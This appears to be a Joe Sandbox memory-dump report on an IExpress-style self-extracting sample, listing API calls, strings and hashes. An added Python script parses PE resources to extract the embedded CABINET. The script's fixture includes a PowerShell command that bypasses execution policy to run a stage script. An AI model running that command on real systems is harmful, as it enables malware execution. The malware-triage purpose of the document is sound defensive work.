                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 1084409-0
                                                                                                                • Opcode ID: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                                                • Instruction ID: 7ab910376f474aa8783b8086346d7eaaf841467a17f8caa1ed32e5e26418b28a
                                                                                                                • Opcode Fuzzy Hash: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                                                • Instruction Fuzzy Hash: B7210921A0854286E7118F16E644335A7A1AF857A8F54C235DA6DCA6E4FF7EF405CBC0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 2018477427-0
                                                                                                                • Opcode ID: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                                                • Instruction ID: 5ae08cdb2dab567d20f19fdfd241b38554c6fcc7825681e82a9ab491b9f9f73e
                                                                                                                • Opcode Fuzzy Hash: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                                                • Instruction Fuzzy Hash: 6411853191C65282FB118F14A68437466A0FB45319F24C270DB6EC66E1FF7FB88582C0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharPrev
                                                                                                                • String ID:
                                                                                                                • API String ID: 122130370-0
                                                                                                                • Opcode ID: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                                                • Instruction ID: 5b617896d4522fd2575fb4a886731550fbd04036157c98545086c32949813107
                                                                                                                • Opcode Fuzzy Hash: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                                                • Instruction Fuzzy Hash: 57018012A0C6C1C6F7114B15AA4026DBA90B785BA0F58D270EB79C77D7EF3DE88287C0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                                                • Instruction ID: 25c51235a7947353b85925d98565c164496ce14da378ba044942c6067635ba3c
                                                                                                                • Opcode Fuzzy Hash: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                                                • Instruction Fuzzy Hash: 5BF01D326186C2D2EB184F25F6811B876B0EB48B58F148275DB3BC76D4EF79E485C790
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                                • String ID: $124$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                                • API String ID: 3530494346-2944290832
                                                                                                                • Opcode ID: ccd9306e1016298e6bebe3b198e952bf491475324bfa792ea5420485550b1857
                                                                                                                • Instruction ID: 16998923f189589346ffc770de136d19814939cfc35cca794f7c55c4f651e94f
                                                                                                                • Opcode Fuzzy Hash: ccd9306e1016298e6bebe3b198e952bf491475324bfa792ea5420485550b1857
                                                                                                                • Instruction Fuzzy Hash: 26717171E0C68286F7609B61A7803796A92AB85B95F54C130CB7EC26C5FF7EF40587C0
APIs
  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215220
  • Part of subcall function 00007FF6FD2151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215231
  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215257
  • Part of subcall function 00007FF6FD2151F8: LoadResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215268
  • Part of subcall function 00007FF6FD2151F8: LockResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215277
  • Part of subcall function 00007FF6FD2151F8: memcpy_s.MSVCRT ref: 00007FF6FD215296
  • Part of subcall function 00007FF6FD2151F8: FreeResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD2152A5
• FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD215FB0
• LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD215FC1
• LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD215FD0
• GetDlgItem.USER32 ref: 00007FF6FD215FFD
• ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD21600E
• GetDlgItem.USER32 ref: 00007FF6FD216026
• ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD21603A
• FreeResource.KERNEL32 ref: 00007FF6FD216151
• SendMessageA.USER32 ref: 00007FF6FD2161B3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
• String ID: CABINET
• API String ID: 1305606123-1940454314
• Opcode ID: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
• Instruction ID: 32c8c61efe46b9b5e074b71860e6975bd4988c99d5565895643d9292f2c48c0d
• Opcode Fuzzy Hash: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
• Instruction Fuzzy Hash: E7416B35A0864286FB108B64AA543796AA0FF89B4AF45C034CB2EC27D1FF3FF00486C0
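The function above resolves a resource named "CABINET" with FindResourceA, maps it with LoadResource/LockResource and copies it out with memcpy_s: this is the resource-extraction path of an IExpress/wextract-style self-extractor, which matches the IXP000.TMP temp directory seen in the neighbouring function. A practitioner triaging such a sample wants the embedded cabinet (and any other named payload resources) without running it. The Python below is an added example, not Joe Sandbox output and not code from the sample: it walks the PE resource directory tree (type, then name, then language) and returns every named RT_RCDATA resource, and it ships with a constructed minimal PE32+ fixture so it runs offline. Assumptions not shown on this page: that the stub stores CABINET under resource type RT_RCDATA (10), and the second resource name "RUNPROGRAM" in the fixture, which is taken from the IExpress package format rather than from this report.

```python
import struct
import sys

RT_RCDATA = 10            # assumed resource type under which the stub stores CABINET
SUBDIR_FLAG = 0x80000000  # high bit set: entry points at a sub-directory / a name string

# Constructed fixture. "CABINET" is the name the report shows; "RUNPROGRAM" is
# assumed from the IExpress format and does not appear on this page.
SAMPLE_RESOURCES = {
    "CABINET": b"MSCF" + b"\0" * 28 + b"<constructed cab body>",
    "RUNPROGRAM": b"powershell -ep bypass -f .\\stage.ps1",
}


def extract_named_rcdata(pe: bytes) -> dict:
    """Walk the resource tree (type -> name -> language); return {name: bytes} for named RT_RCDATA."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsec, _, _, _, opt_size = struct.unpack_from("<HHIIIH", pe, e_lfanew + 4)  # COFF header
    opt = e_lfanew + 24
    datadir = opt + (112 if struct.unpack_from("<H", pe, opt)[0] == 0x20B else 96)  # PE32+ / PE32
    rsrc_rva, rsrc_size = struct.unpack_from("<II", pe, datadir + 2 * 8)  # IMAGE_DIRECTORY_ENTRY_RESOURCE
    if rsrc_size == 0:
        return {}
    sections = [struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8) for i in range(nsec)]

    def rva_to_off(rva):                  # sections: (VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)
        for vsize, va, rawsize, rawptr in sections:
            if va <= rva < va + max(vsize, rawsize):
                return rva - va + rawptr
        raise ValueError(f"RVA {rva:#x} is not backed by any section")

    base = rva_to_off(rsrc_rva)

    def read_dir(off):                    # yields (key, target, is_subdir) per directory entry
        named, ids = struct.unpack_from("<HH", pe, base + off + 12)
        for i in range(named + ids):
            name, data = struct.unpack_from("<II", pe, base + off + 16 + 8 * i)
            if name & SUBDIR_FLAG:        # IMAGE_RESOURCE_DIR_STRING_U: u16 length + UTF-16LE chars
                soff = base + (name & ~SUBDIR_FLAG)
                n = struct.unpack_from("<H", pe, soff)[0]
                name = pe[soff + 2:soff + 2 + 2 * n].decode("utf-16le")
            yield name, data & ~SUBDIR_FLAG, bool(data & SUBDIR_FLAG)

    found = {}
    for rtype, toff, tsub in read_dir(0):
        if rtype != RT_RCDATA or not tsub:
            continue
        for name, noff, nsub in read_dir(toff):
            if not isinstance(name, str) or not nsub:
                continue
            for _lang, loff, lsub in read_dir(noff):   # first language entry wins
                if not lsub:
                    data_rva, size = struct.unpack_from("<II", pe, base + loff)  # IMAGE_RESOURCE_DATA_ENTRY
                    found[name] = pe[rva_to_off(data_rva):rva_to_off(data_rva) + size]
                    break
    return found


def build_test_pe(resources: dict, rsrc_rva: int = 0x1000) -> bytes:
    """Constructed fixture: minimal PE32+ whose only section is .rsrc holding named RT_RCDATA blobs."""
    names = sorted(resources)             # the loader's binary search expects named entries sorted
    n = len(names)
    type_off = 24                         # root dir (16) + one id entry (8)
    lang_off = type_off + 16 + 8 * n      # one language dir (16 + 8) per name
    leaf_off = lang_off + 24 * n          # one IMAGE_RESOURCE_DATA_ENTRY (16) per name
    str_off = leaf_off + 16 * n
    enc = [struct.pack("<H", len(nm)) + nm.encode("utf-16le") for nm in names]
    str_offs = [str_off + sum(map(len, enc[:i])) for i in range(n)]
    blob_off = (str_off + sum(map(len, enc)) + 3) & ~3
    blob_offs = [blob_off + sum(len(resources[nm]) for nm in names[:i]) for i in range(n)]
    dir_hdr = lambda named, ids: struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids)  # IMAGE_RESOURCE_DIRECTORY
    entry = lambda key, off, sub: struct.pack("<II", key, off | (SUBDIR_FLAG if sub else 0))
    rsrc = dir_hdr(0, 1) + entry(RT_RCDATA, type_off, True)
    rsrc += dir_hdr(n, 0) + b"".join(entry(SUBDIR_FLAG | str_offs[i], lang_off + 24 * i, True) for i in range(n))
    rsrc += b"".join(dir_hdr(0, 1) + entry(0x409, leaf_off + 16 * i, False) for i in range(n))
    rsrc += b"".join(struct.pack("<IIII", rsrc_rva + blob_offs[i], len(resources[nm]), 0, 0)
                     for i, nm in enumerate(names))
    rsrc += b"".join(enc).ljust(blob_off - str_off, b"\0") + b"".join(resources[nm] for nm in names)
    raw = (len(rsrc) + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x22)            # x64, 1 section, 240-byte optional hdr
    opt = struct.pack("<HBBIIIII", 0x20B, 14, 0, 0, 0, 0, 0, 0)              # PE32+ magic
    opt += struct.pack("<QIIHHHHHHI", 0x140000000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0)
    opt += struct.pack("<IIIHH", rsrc_rva + ((len(rsrc) + 0xFFF) & ~0xFFF), 0x200, 0, 2, 0)
    opt += struct.pack("<QQQQII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[2] = (rsrc_rva, len(rsrc))                                            # resource data directory
    opt += b"".join(struct.pack("<II", *dd) for dd in dirs)
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_rva, raw, 0x200, 0, 0, 0, 0, 0x40000040)
    return (dos + b"PE\0\0" + coff + opt + sec).ljust(0x200, b"\0") + rsrc.ljust(raw, b"\0")


if __name__ == "__main__":                # usage: python extract_rcdata.py <sample.exe>
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe(SAMPLE_RESOURCES)
    for name, data in extract_named_rcdata(image).items():
        print(f"{name:<14}{len(data):>8} bytes  head={data[:4]!r}")
```

Run it against the real file to list the named RCDATA resources and their sizes; a resource called CABINET whose data begins with MSCF is the embedded cabinet, which can then be unpacked with any CAB tool without letting the stub execute its post-extraction command.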
APIs
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
• String ID:
• API String ID: 2168512254-0
• Opcode ID: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
• Instruction ID: b088ae4c52d9e3f8c74877f3a216602f0ad762edfd5f0359a7fc9e788c32ca97
• Opcode Fuzzy Hash: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
• Instruction Fuzzy Hash: CD512F32604A41CAE7108F25E5942AD7BA4FB8DB88F519135DB2DD3798FF3AE444CB80
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2829607268-3733053543
• Opcode ID: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
• Instruction ID: 4d51de96581ca0aa9e2ca6881a7085a6c072840b721a064e6c7f66f6d60f5194
• Opcode Fuzzy Hash: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
• Instruction Fuzzy Hash: F0219572A1864287F7508B20E14577ABB60FBC9749F40D135DB5EC2A94FF3DE0458B80
APIs
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
• Opcode ID: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
• Instruction ID: bdd4ef20b097fec436687d6f718846d469512ec7bbaac4b7de2eedf0413ae1b1
• Opcode Fuzzy Hash: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
• Instruction Fuzzy Hash: 3B111526A04B428AEB009F60E9442A833A4FB4975CF404A31EA7DC6794FF79E1A482C0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
• Instruction ID: 8ffdd4da949df38d582d314313a6940f78e81d2c0fb6476e88a8d0152ed769cd
• Opcode Fuzzy Hash: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
• Instruction Fuzzy Hash: B9B09B0661759241D60557B54E4904516401B465287881554C738C1990E95DA1594644
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
• String ID: $124
• API String ID: 2654313074-3252604691
• Opcode ID: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
• Instruction ID: f8b7066810a66b70c40f32c3b76ef008a27bb0972d0c7c7457330bd137e17c54
• Opcode Fuzzy Hash: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
• Instruction Fuzzy Hash: 62518031A0864286E7109B15EA84279AAA2FB89B55F54D231CB3DC3BD4FF3EB14587C0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$:$RegServer
• API String ID: 1203814774-766454958
• Opcode ID: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
• Instruction ID: f2c40d89d915cb1af5d4eabd6a3127be3d0d02c01f14be4cace325a9dc9e617d
• Opcode Fuzzy Hash: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
• Instruction Fuzzy Hash: 36029061A0C682C5EB218B2856142797BA1AF85790F688535CB7EC76D6FE3FF406C7C0
APIs
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214B9A
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214BBE
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214BDE
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214C05
• GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214C36
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214C54
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214C6E
• FreeLibrary.KERNEL32 ref: 00007FF6FD214D50
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214D6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
• Instruction ID: 5f9994be0c418c5df2d208d0d419da69899e691fee36b709fc3a8ac271737462
• Opcode Fuzzy Hash: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
• Instruction Fuzzy Hash: 33516E25A0978186EB118B15AA10179BBA0FB89B84F948175CB6EC77D0FF3EF405C7C0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                • API String ID: 229715263-2428544900
                                                                                                                • Opcode ID: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                                                • Instruction ID: f500d763d697613f838b24801c4bf13f57636d0d928221c7199c2055432b10a7
                                                                                                                • Opcode Fuzzy Hash: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                                                • Instruction Fuzzy Hash: AD51633260868186EB118B10E5442BABBA0FF89B84F559131EB6E877D4FF3EE445C7D0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                                • String ID: 124$rce.
                                                                                                                • API String ID: 2929476258-4159208397
                                                                                                                • Opcode ID: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
